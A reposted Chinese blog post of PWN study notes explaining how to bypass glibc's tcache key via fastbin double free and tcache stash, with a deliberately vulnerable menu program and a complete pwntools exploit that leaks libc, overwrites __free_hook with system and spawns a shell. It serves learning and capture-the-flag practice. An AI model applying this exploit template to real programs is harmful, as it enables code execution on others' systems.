当前位置：首页 > news >正文

【我的 PWN 学习手札】tcache stash with fastbin double free —— tcache key 绕过

news 文章来源：https://blog.csdn.net/Mr_Fmnwon/article/details/142424065 2025/5/23 23:05:04

参考看雪课程：PWN 探索篇

前言

tcache key 的引入使得 tcache dup 利用出现了困难。除了简单利用 UAF 覆写 key 或者House Of Karui 之外，还可以利用 ptmalloc 中的其他机制进行绕过。

一、Tcache Stash with Fastbin Double Free

之前是 double free 后，chunk 被放入不同的 tcachebin 中来绕过检查。这里则是借助 fastbin 以及 tcache stash 机制实现利用。具体过程如下：

通过多次释放同样大小的堆块，能在内存中实现下述布局

其中 fastbin 中的 chunk8 经过了double free（fastbin 的 double free 检查仅校验释放的 chunk 和 bin 头部的 chunk 是否一致）

当我们申请七次清空 tcachebin 时：

当再一次申请该大小的 chunk 会发生什么？这个过程有些绕，让我们慢慢理解。

首先，fastbin 头部的 chunk 被取下来。这里的取下来仅仅是指 fastbin 返回头部 chunk 然后指向下一个 chunk，而且别忘了，取出的 chunk 的值未改变，因此指针还存在：

然后会无缝地进行 tcache stash —— 将 fastbin 中的 chunk 填充到 tcachebin 中，首先头部的 chunk9 进入 tcachebin

然后轮到 chunk8 进入 tcachebin

然后又是 chunk9 进入 tcachebin

接下来你可能会认为，将 chunk9 申请出来修改其 next 即可实现 tcache poisoning，然而这种较高版本 tcache 的 count 数组被用于检查 tcache 是否为空。即上图目前 tcache 记录有 3 个chunk，即使 chunk9 的 next 被修改，也无法更多的申请出 poisoning 的堆块。

不过注意已经取出的合法 chunk 们，可以发现，chunk8已经被我们取出，因此我们直接修改chunk8 的 next 指针，即可实现 tcache poisoning。

二、测试与模板

#include<stdlib.h>
#include <stdio.h>
#include <unistd.h>char *chunk_list[0x100];void menu() {puts("1. add chunk");puts("2. delete chunk");puts("3. edit chunk");puts("4. show chunk");puts("5. exit");puts("choice:");
}int get_num() {char buf[0x10];read(0, buf, sizeof(buf));return atoi(buf);
}void add_chunk() {puts("index:");int index = get_num();puts("size:");int size = get_num();chunk_list[index] = malloc(size);
}void delete_chunk() {puts("index:");int index = get_num();free(chunk_list[index]);
}void edit_chunk() {puts("index:");int index = get_num();puts("length:");int length = get_num();puts("content:");read(0, chunk_list[index], length);
}void show_chunk() {puts("index:");int index = get_num();puts(chunk_list[index]);
}int main() {setbuf(stdin, NULL);setbuf(stdout, NULL);setbuf(stderr, NULL);while (1) {menu();switch (get_num()) {case 1:add_chunk();break;case 2:delete_chunk();break;case 3:edit_chunk();break;case 4:show_chunk();break;case 5:exit(0);default:puts("invalid choice.");}}
}

from pwn import *
elf=ELF('./pwn')
libc=ELF('./libc.so.6')
context.arch=elf.arch
context.log_level='debug'io=process('./pwn')
def add(index,size):io.sendlineafter(b'choice:\n',b'1')io.sendlineafter(b'index:\n',str(index).encode())io.sendlineafter(b'size:\n',str(size).encode())
def delete(index):io.sendlineafter(b'choice:\n',b'2')io.sendlineafter(b'index:\n',str(index).encode())
def edit(index,length,content):io.sendlineafter(b'choice:\n',b'3')io.sendlineafter(b'index',str(index).encode())io.sendlineafter(b'length:\n',str(length).encode())io.sendafter(b'content:\n',content)
def show(index):io.sendlineafter(b'choice:\n',b'4')io.sendlineafter(b'index:\n',str(index).encode())gdb.attach(io)
# leak libc
add(0,0x410)
add(1,0x10)
delete(0)
show(0)
libc_base=u64(io.recv(6).ljust(8,b'\x00'))-0x7591b55b6be0+0x7591b5200000
libc.address=libc_base
success(hex(libc_base))
add(0,0x410)# tcache stash with fastbin attach
for i in range(9): add(i,0x20)
for i in range(2,9): delete(i)
delete(0)
delete(1)
delete(0)for i in range(2,9): add(i,0x20)
add(2,0x20)
pause()
edit(2,0x8,p64(libc.sym['__free_hook']))
pause()
add(0,0x20)
add(0,0x20)
add(0,0x20)
edit(0,0x8,p64(libc.sym['system']))
pause()
edit(3,0x8,b'/bin/sh\x00')
pause()
delete(3)
io.interactive()

【我的 PWN 学习手札】tcache stash with fastbin double free —— tcache key 绕过

前言

一、Tcache Stash with Fastbin Double Free

二、测试与模板

相关文章：

【我的 PWN 学习手札】tcache stash with fastbin double free —— tcache key 绕过

How can I stream a response from LangChain‘s OpenAI using Flask API?

什么是慢充优惠话费充值api？如何选择平台

【MySQL 03】表的操作

3、论文阅读：EnYOLO：一种基于图像增强的水下目标区域自适应实时检测框架

MYSQL面试知识点手册

排序算法的分析和应用

iptables限制网速

ALSA ubuntu 编译

【学习笔记】SSL/TLS证书安全机制之证书透明

网络编程问题解答

【开源免费】基于SpringBoot+Vue.JS服装商城系统（JAVA毕业设计）

C语言字符串学习

当你在Linux系统中使用MySQL命令行工具查询数据库时，如果中文显示为问号（?）或其他乱码，简单解决办法。（2）

API网关之Fizz Gateway

pgvector docker版安装；稀疏向量使用；psycopg2 python连接使用

C#命令行参数解析库System.CommandLine介绍

CCF CSP题解：密码（key）（202409-1）

RuntimeError: Maximum Recursion Depth Exceeded - 递归深度超限的完美解决方案

Linux1-ls,cd,pwd

【高级编程】XML DOM4J解析XML文件（含案例）

查看VSFTPD配置的服务器路径和linux系统有哪些用户

JavaEE: 创造无限连接——网络编程中的套接字

记K8s组件harbor和kuboard故障恢复

c++ return {}；

【设计模式-适配】

深度学习02-pytorch-08-自动微分模块

使用Python实现深度学习模型：智能宠物监控与管理

【HTTPS】对称加密和非对称加密

MySQL中的LIMIT与ORDER BY关键字详解